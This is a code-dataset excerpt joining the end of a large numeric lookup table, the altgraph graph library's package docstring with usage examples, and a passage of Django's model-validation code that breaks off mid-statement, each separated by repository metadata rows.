5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,1687,
5936,5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,
5952,1688,1689,5953,1199,5954,5955,5956,5957,5958,5959,5960,5961,1690,5962,5963,
5964,5965,5966,5967,5968,5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,
5980,5981,1385,5982,1386,5983,5984,5985,5986,5987,5988,5989,5990,5991,5992,5993,
5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6008,6009,
6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020,6021,6022,6023,6024,6025,
6026,6027,1265,6028,6029,1691,6030,6031,6032,6033,6034,6035,6036,6037,6038,6039,
6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052,6053,6054,6055,
6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068,6069,6070,6071,
6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084,1692,6085,6086,
6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100,6101,6102,
6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116,6117,6118,
6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,1693,6132,6133,
6134,6135,6136,1694,6137,6138,6139,6140,6141,1695,6142,6143,6144,6145,6146,6147,
6148,6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163,
6164,6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179,
6180,6181,6182,6183,6184,6185,1696,6186,6187,6188,6189,6190,6191,6192,6193,6194,
6195,6196,6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210,
6211,6212,6213,6214,6215,6216,6217,6218,6219,1697,6220,6221,6222,6223,6224,6225,
6226,6227,6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241,
6242,6243,6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,1698,6254,6255,6256,
6257,6258,6259,6260,6261,6262,6263,1200,6264,6265,6266,6267,6268,6269,6270,6271, #1024
6272,6273,6274,6275,6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,6286,6287,
6288,6289,6290,6291,6292,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,1699,
6303,6304,1700,6305,6306,6307,6308,6309,6310,6311,6312,6313,6314,6315,6316,6317,
6318,6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333,
6334,6335,6336,6337,6338,6339,1701,6340,6341,6342,6343,6344,1387,6345,6346,6347,
6348,6349,6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363,
6364,6365,6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379,
6380,6381,6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395,
6396,6397,6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,6411,
6412,6413,1702,6414,6415,6416,6417,6418,6419,6420,6421,6422,1703,6423,6424,6425,
6426,6427,6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,1704,6439,6440,
6441,6442,6443,6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,6455,6456,
6457,6458,6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472,
6473,6474,6475,6476,6477,6478,6479,6480,6481,6482,6483,6484,6485,6486,6487,6488,
6489,6490,6491,6492,6493,6494,6495,6496,6497,6498,6499,6500,6501,6502,6503,1266,
6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516,6517,6518,6519,
6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532,6533,6534,6535,
6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548,6549,6550,6551,
1705,1706,6552,6553,6554,6555,6556,6557,6558,6559,6560,6561,6562,6563,6564,6565,
6566,6567,6568,6569,6570,6571,6572,6573,6574,6575,6576,6577,6578,6579,6580,6581,
6582,6583,6584,6585,6586,6587,6588,6589,6590,6591,6592,6593,6594,6595,6596,6597,
6598,6599,6600,6601,6602,6603,6604,6605,6606,6607,6608,6609,6610,6611,6612,6613,
6614,6615,6616,6617,6618,6619,6620,6621,6622,6623,6624,6625,6626,6627,6628,6629,
6630,6631,6632,6633,6634,6635,6636,6637,1388,6638,6639,6640,6641,6642,6643,6644,
1707,6645,6646,6647,6648,6649,6650,6651,6652,6653,6654,6655,6656,6657,6658,6659,
6660,6661,6662,6663,1708,6664,6665,6666,6667,6668,6669,6670,6671,6672,6673,6674,
1201,6675,6676,6677,6678,6679,6680,6681,6682,6683,6684,6685,6686,6687,6688,6689,
6690,6691,6692,6693,6694,6695,6696,6697,6698,6699,6700,6701,6702,6703,6704,6705,
6706,6707,6708,6709,6710,6711,6712,6713,6714,6715,6716,6717,6718,6719,6720,6721,
6722,6723,6724,6725,1389,6726,6727,6728,6729,6730,6731,6732,6733,6734,6735,6736,
1390,1709,6737,6738,6739,6740,6741,6742,1710,6743,6744,6745,6746,1391,6747,6748,
6749,6750,6751,6752,6753,6754,6755,6756,6757,1392,6758,6759,6760,6761,6762,6763,
6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777,6778,6779,
6780,1202,6781,6782,6783,6784,6785,6786,6787,6788,6789,6790,6791,6792,6793,6794,
6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806,6807,6808,6809,1711,
6810,6811,6812,6813,6814,6815,6816,6817,6818,6819,6820,6821,6822,6823,6824,6825,
6826,6827,6828,6829,6830,6831,6832,6833,6834,6835,6836,1393,6837,6838,6839,6840,
6841,6842,6843,6844,6845,6846,6847,6848,6849,6850,6851,6852,6853,6854,6855,6856,
6857,6858,6859,6860,6861,6862,6863,6864,6865,6866,6867,6868,6869,6870,6871,6872,
6873,6874,6875,6876,6877,6878,6879,6880,6881,6882,6883,6884,6885,6886,6887,6888,
6889,6890,6891,6892,6893,6894,6895,6896,6897,6898,6899,6900,6901,6902,1712,6903,
6904,6905,6906,6907,6908,6909,6910,1713,6911,6912,6913,6914,6915,6916,6917,6918,
6919,6920,6921,6922,6923,6924,6925,6926,6927,6928,6929,6930,6931,6932,6933,6934,
6935,6936,6937,6938,6939,6940,6941,6942,6943,6944,6945,6946,6947,6948,6949,6950,
6951,6952,6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966,
6967,6968,6969,6970,6971,6972,6973,6974,1714,6975,6976,6977,6978,6979,6980,6981,
6982,6983,6984,6985,6986,6987,6988,1394,6989,6990,6991,6992,6993,6994,6995,6996,
6997,6998,6999,7000,1715,7001,7002,7003,7004,7005,7006,7007,7008,7009,7010,7011,
7012,7013,7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027,
7028,1716,7029,7030,7031,7032,7033,7034,7035,7036,7037,7038,7039,7040,7041,7042,
7043,7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058,
7059,7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,7071,7072,7073,7074,
7075,7076,7077,7078,7079,7080,7081,7082,7083,7084,7085,7086,7087,7088,7089,7090,
7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105,7106,
7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,7119,7120,7121,7122,
7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136,7137,7138,
7139,7140,7141,7142,7143,7144,7145,7146,7147,7148,7149,7150,7151,7152,7153,7154,
7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167,7168,7169,7170,
7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183,7184,7185,7186,
7187,7188,7189,7190,7191,7192,7193,7194,7195,7196,7197,7198,7199,7200,7201,7202,
7203,7204,7205,7206,7207,1395,7208,7209,7210,7211,7212,7213,1717,7214,7215,7216,
7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229,7230,7231,7232,
7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245,7246,7247,7248,
7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261,7262,7263,7264,
7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277,7278,7279,7280,
7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293,7294,7295,7296,
7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308,7309,7310,7311,7312,
7313,1718,7314,7315,7316,7317,7318,7319,7320,7321,7322,7323,7324,7325,7326,7327,
7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339,7340,7341,7342,7343,
7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,7354,7355,7356,7357,7358,7359,
7360,7361,7362,7363,7364,7365,7366,7367,7368,7369,7370,7371,7372,7373,7374,7375,
7376,7377,7378,7379,7380,7381,7382,7383,7384,7385,7386,7387,7388,7389,7390,7391,
7392,7393,7394,7395,7396,7397,7398,7399,7400,7401,7402,7403,7404,7405,7406,7407,
7408,7409,7410,7411,7412,7413,7414,7415,7416,7417,7418,7419,7420,7421,7422,7423,
7424,7425,7426,7427,7428,7429,7430,7431,7432,7433,7434,7435,7436,7437,7438,7439,
7440,7441,7442,7443,7444,7445,7446,7447,7448,7449,7450,7451,7452,7453,7454,7455,
7456,7457,7458,7459,7460,7461,7462,7463,7464,7465,7466,7467,7468,7469,7470,7471,
7472,7473,7474,7475,7476,7477,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,
7488,7489,7490,7491,7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,7503,
7504,7505,7506,7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519,
7520,7521,7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535,
7536,7537,7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,7550,7551,
7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567,
7568,7569,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582,7583,
7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598,7599,
7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614,7615,
7616,7617,7618,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628,7629,7630,7631,
7632,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643,7644,7645,7646,7647,
7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659,7660,7661,7662,7663,
7664,7665,7666,7667,7668,7669,7670,7671,7672,7673,7674,7675,7676,7677,7678,7679,
7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690,7691,7692,7693,7694,7695,
7696,7697,7698,7699,7700,7701,7702,7703,7704,7705,7706,7707,7708,7709,7710,7711,
7712,7713,7714,7715,7716,7717,7718,7719,7720,7721,7722,7723,7724,7725,7726,7727,
7728,7729,7730,7731,7732,7733,7734,7735,7736,7737,7738,7739,7740,7741,7742,7743,
7744,7745,7746,7747,7748,7749,7750,7751,7752,7753,7754,7755,7756,7757,7758,7759,
7760,7761,7762,7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775,
7776,7777,7778,7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791,
7792,7793,7794,7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,7806,7807,
7808,7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,
7824,7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,
7840,7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855,
7856,7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871,
7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887,
7888,7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903,
7904,7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919,
7920,7921,7922,7923,7924,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935,
7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951,
7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967,
7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983,
7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999,
8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,
8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031,
8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047,
8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,
8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,
8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,
8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111,
8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127,
8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143,
8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159,
8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175,
8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191,
8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207,
8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223,
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239,
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255,
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271,
8272,8273,8274,8275,8276,8277,8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,
8288,8289,8290,8291,8292,8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,
8304,8305,8306,8307,8308,8309,8310,8311,8312,8313,8314,8315,8316,8317,8318,8319,
8320,8321,8322,8323,8324,8325,8326,8327,8328,8329,8330,8331,8332,8333,8334,8335,
8336,8337,8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,
8352,8353,8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,8364,8365,8366,8367,
8368,8369,8370,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382,8383,
8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398,8399,
8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,8411,8412,8413,8414,8415,
8416,8417,8418,8419,8420,8421,8422,8423,8424,8425,8426,8427,8428,8429,8430,8431,
8432,8433,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443,8444,8445,8446,8447,
8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459,8460,8461,8462,8463,
8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475,8476,8477,8478,8479,
8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490,8491,8492,8493,8494,8495,
8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506,8507,8508,8509,8510,8511,
8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522,8523,8524,8525,8526,8527,
8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538,8539,8540,8541,8542,8543,
8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554,8555,8556,8557,8558,8559,
8560,8561,8562,8563,8564,8565,8566,8567,8568,8569,8570,8571,8572,8573,8574,8575,
8576,8577,8578,8579,8580,8581,8582,8583,8584,8585,8586,8587,8588,8589,8590,8591,
8592,8593,8594,8595,8596,8597,8598,8599,8600,8601,8602,8603,8604,8605,8606,8607,
8608,8609,8610,8611,8612,8613,8614,8615,8616,8617,8618,8619,8620,8621,8622,8623,
8624,8625,8626,8627,8628,8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,8639,
8640,8641,8642,8643,8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,
8656,8657,8658,8659,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,
8672,8673,8674,8675,8676,8677,8678,8679,8680,8681,8682,8683,8684,8685,8686,8687,
8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,
8704,8705,8706,8707,8708,8709,8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,
8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,
8736,8737,8738,8739,8740,8741)
# flake8: noqa
| mit | 6,151,471,407,183,996,000 | 76.144295 | 92 | 0.762452 | false |
joaormatos/anaconda | Anaconda/standalone/trunk/PyInstaller/lib/altgraph/__init__.py | 12 | 4907 | '''
altgraph - a python graph library
=================================
altgraph is a fork of `graphlib <http://pygraphlib.sourceforge.net>`_ tailored
to use newer Python 2.3+ features, including additional support used by the
py2app suite (modulegraph and macholib, specifically).
altgraph is a python based graph (network) representation and manipulation package.
It has started out as an extension to the `graph_lib module <http://www.ece.arizona.edu/~denny/python_nest/graph_lib_1.0.1.html>`_
written by Nathan Denny it has been significantly optimized and expanded.
The :class:`altgraph.Graph.Graph` class is loosely modeled after the `LEDA <http://www.algorithmic-solutions.com/enleda.htm>`_
(Library of Efficient Datatypes) representation. The library
includes methods for constructing graphs, BFS and DFS traversals,
topological sort, finding connected components, shortest paths as well as a number
graph statistics functions. The library can also visualize graphs
via `graphviz <http://www.research.att.com/sw/tools/graphviz/>`_.
The package contains the following modules:
- the :py:mod:`altgraph.Graph` module contains the :class:`~altgraph.Graph.Graph` class that stores the graph data
- the :py:mod:`altgraph.GraphAlgo` module implements graph algorithms operating on graphs (:py:class:`~altgraph.Graph.Graph`} instances)
- the :py:mod:`altgraph.GraphStat` module contains functions for computing statistical measures on graphs
- the :py:mod:`altgraph.GraphUtil` module contains functions for generating, reading and saving graphs
- the :py:mod:`altgraph.Dot` module contains functions for displaying graphs via `graphviz <http://www.research.att.com/sw/tools/graphviz/>`_
- the :py:mod:`altgraph.ObjectGraph` module implements a graph of objects with a unique identifier
Installation
------------
Download and unpack the archive then type::
python setup.py install
This will install the library in the default location. For instructions on
how to customize the install procedure read the output of::
python setup.py --help install
To verify that the code works run the test suite::
python setup.py test
Example usage
-------------
Lets assume that we want to analyze the graph below (links to the full picture) GRAPH_IMG.
Our script then might look the following way::
from altgraph import Graph, GraphAlgo, Dot
# these are the edges
edges = [ (1,2), (2,4), (1,3), (2,4), (3,4), (4,5), (6,5),
(6,14), (14,15), (6, 15), (5,7), (7, 8), (7,13), (12,8),
(8,13), (11,12), (11,9), (13,11), (9,13), (13,10) ]
# creates the graph
graph = Graph.Graph()
for head, tail in edges:
graph.add_edge(head, tail)
# do a forward bfs from 1 at most to 20
print graph.forw_bfs(1)
This will print the nodes in some breadth first order::
[1, 2, 3, 4, 5, 7, 8, 13, 11, 10, 12, 9]
If we wanted to get the hop-distance from node 1 to node 8
we coud write::
print graph.get_hops(1, 8)
This will print the following::
[(1, 0), (2, 1), (3, 1), (4, 2), (5, 3), (7, 4), (8, 5)]
Node 1 is at 0 hops since it is the starting node, nodes 2,3 are 1 hop away ...
node 8 is 5 hops away. To find the shortest distance between two nodes you
can use::
print GraphAlgo.shortest_path(graph, 1, 12)
It will print the nodes on one (if there are more) the shortest paths::
[1, 2, 4, 5, 7, 13, 11, 12]
To display the graph we can use the GraphViz backend::
dot = Dot.Dot(graph)
# display the graph on the monitor
dot.display()
# save it in an image file
dot.save_img(file_name='graph', file_type='gif')
..
@author: U{Istvan Albert<http://www.personal.psu.edu/staff/i/u/iua1/>}
@license: MIT License
Copyright (c) 2004 Istvan Albert unless otherwise noted.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do
so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
@requires: Python 2.3 or higher
@newfield contributor: Contributors:
@contributor: U{Reka Albert <http://www.phys.psu.edu/~ralbert/>}
'''
__version__ = '0.7.0'
class GraphError(ValueError):
pass
| gpl-3.0 | 6,541,694,398,967,050,000 | 35.348148 | 147 | 0.707968 | false |
joshblum/django-with-audit | django/core/management/validation.py | 79 | 19846 | import sys
from django.core.management.color import color_style
from django.utils.itercompat import is_iterable
class ModelErrorCollection:
def __init__(self, outfile=sys.stdout):
self.errors = []
self.outfile = outfile
self.style = color_style()
def add(self, context, error):
self.errors.append((context, error))
self.outfile.write(self.style.ERROR("%s: %s\n" % (context, error)))
def get_validation_errors(outfile, app=None):
"""
Validates all models that are part of the specified app. If no app name is provided,
validates all models of all installed apps. Writes errors, if any, to outfile.
Returns number of errors.
"""
from django.conf import settings
from django.db import models, connection
from django.db.models.loading import get_app_errors
from django.db.models.fields.related import RelatedObject
from django.db.models.deletion import SET_NULL, SET_DEFAULT
e = ModelErrorCollection(outfile)
for (app_name, error) in get_app_errors().items():
e.add(app_name, error)
for cls in models.get_models(app):
opts = cls._meta
# Do field-specific validation.
for f in opts.local_fields:
if f.name == 'id' and not f.primary_key and opts.pk.name == 'id':
e.add(opts, '"%s": You can\'t use "id" as a field name, because each model automatically gets an "id" field if none of the fields have primary_key=True. You need to either remove/rename your "id" field or add primary_key=True to a field.' % f.name)
if f.name.endswith('_'):
e.add(opts, '"%s": Field names cannot end with underscores, because this would lead to ambiguous queryset filters.' % f.name)
if (f.primary_key and f.null and
not connection.features.interprets_empty_strings_as_nulls):
# We cannot reliably check this for backends like Oracle which
# consider NULL and '' to be equal (and thus set up
# character-based fields a little differently).
e.add(opts, '"%s": Primary key fields cannot have null=True.' % f.name)
if isinstance(f, models.CharField):
try:
max_length = int(f.max_length)
if max_length <= 0:
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
except (ValueError, TypeError):
e.add(opts, '"%s": CharFields require a "max_length" attribute that is a positive integer.' % f.name)
if isinstance(f, models.DecimalField):
decimalp_ok, mdigits_ok = False, False
decimalp_msg ='"%s": DecimalFields require a "decimal_places" attribute that is a non-negative integer.'
try:
decimal_places = int(f.decimal_places)
if decimal_places < 0:
e.add(opts, decimalp_msg % f.name)
else:
decimalp_ok = True
except (ValueError, TypeError):
e.add(opts, decimalp_msg % f.name)
mdigits_msg = '"%s": DecimalFields require a "max_digits" attribute that is a positive integer.'
try:
max_digits = int(f.max_digits)
if max_digits <= 0:
e.add(opts, mdigits_msg % f.name)
else:
mdigits_ok = True
except (ValueError, TypeError):
e.add(opts, mdigits_msg % f.name)
invalid_values_msg = '"%s": DecimalFields require a "max_digits" attribute value that is greater than or equal to the value of the "decimal_places" attribute.'
if decimalp_ok and mdigits_ok:
if decimal_places > max_digits:
e.add(opts, invalid_values_msg % f.name)
if isinstance(f, models.FileField) and not f.upload_to:
e.add(opts, '"%s": FileFields require an "upload_to" attribute.' % f.name)
if isinstance(f, models.ImageField):
# Try to import PIL in either of the two ways it can end up installed.
try:
from PIL import Image
except ImportError:
try:
import Image
except ImportError:
e.add(opts, '"%s": To use ImageFields, you need to install the Python Imaging Library. Get it at http://www.pythonware.com/products/pil/ .' % f.name)
if isinstance(f, models.BooleanField) and getattr(f, 'null', False):
e.add(opts, '"%s": BooleanFields do not accept null values. Use a NullBooleanField instead.' % f.name)
if f.choices:
if isinstance(f.choices, basestring) or not is_iterable(f.choices):
e.add(opts, '"%s": "choices" should be iterable (e.g., a tuple or list).' % f.name)
else:
for c in f.choices:
if not isinstance(c, (list, tuple)) or len(c) != 2:
e.add(opts, '"%s": "choices" should be a sequence of two-tuples.' % f.name)
if f.db_index not in (None, True, False):
e.add(opts, '"%s": "db_index" should be either None, True or False.' % f.name)
# Perform any backend-specific field validation.
connection.validation.validate_field(e, opts, f)
# Check if the on_delete behavior is sane
if f.rel and hasattr(f.rel, 'on_delete'):
if f.rel.on_delete == SET_NULL and not f.null:
e.add(opts, "'%s' specifies on_delete=SET_NULL, but cannot be null." % f.name)
elif f.rel.on_delete == SET_DEFAULT and not f.has_default():
e.add(opts, "'%s' specifies on_delete=SET_DEFAULT, but has no default value." % f.name)
# Check to see if the related field will clash with any existing
# fields, m2m fields, m2m related objects or related objects
if f.rel:
if f.rel.to not in models.get_models():
e.add(opts, "'%s' has a relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, (str, unicode)):
continue
# Make sure the related field specified by a ForeignKey is unique
if not f.rel.to._meta.get_field(f.rel.field_name).unique:
e.add(opts, "Field '%s' under model '%s' must have a unique=True constraint." % (f.rel.field_name, f.rel.to.__name__))
rel_opts = f.rel.to._meta
rel_name = RelatedObject(f.rel.to, cls, f).get_accessor_name()
rel_query_name = f.related_query_name()
if not f.rel.is_hidden():
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
seen_intermediary_signatures = []
for i, f in enumerate(opts.local_many_to_many):
# Check to see if the related m2m field will clash with any
# existing fields, m2m fields, m2m related objects or related
# objects
if f.rel.to not in models.get_models():
e.add(opts, "'%s' has an m2m relation with model %s, which has either not been installed or is abstract." % (f.name, f.rel.to))
# it is a string and we could not find the model it refers to
# so skip the next section
if isinstance(f.rel.to, (str, unicode)):
continue
# Check that the field is not set to unique. ManyToManyFields do not support unique.
if f.unique:
e.add(opts, "ManyToManyFields cannot be unique. Remove the unique argument on '%s'." % f.name)
if f.rel.through is not None and not isinstance(f.rel.through, basestring):
from_model, to_model = cls, f.rel.to
if from_model == to_model and f.rel.symmetrical and not f.rel.through._meta.auto_created:
e.add(opts, "Many-to-many fields with intermediate tables cannot be symmetrical.")
seen_from, seen_to, seen_self = False, False, 0
for inter_field in f.rel.through._meta.fields:
rel_to = getattr(inter_field.rel, 'to', None)
if from_model == to_model: # relation to self
if rel_to == from_model:
seen_self += 1
if seen_self > 2:
e.add(opts, "Intermediary model %s has more than "
"two foreign keys to %s, which is ambiguous "
"and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
if rel_to == from_model:
if seen_from:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
from_model._meta.object_name
)
)
else:
seen_from = True
elif rel_to == to_model:
if seen_to:
e.add(opts, "Intermediary model %s has more "
"than one foreign key to %s, which is "
"ambiguous and is not permitted." % (
f.rel.through._meta.object_name,
rel_to._meta.object_name
)
)
else:
seen_to = True
if f.rel.through not in models.get_models(include_auto_created=True):
e.add(opts, "'%s' specifies an m2m relation through model "
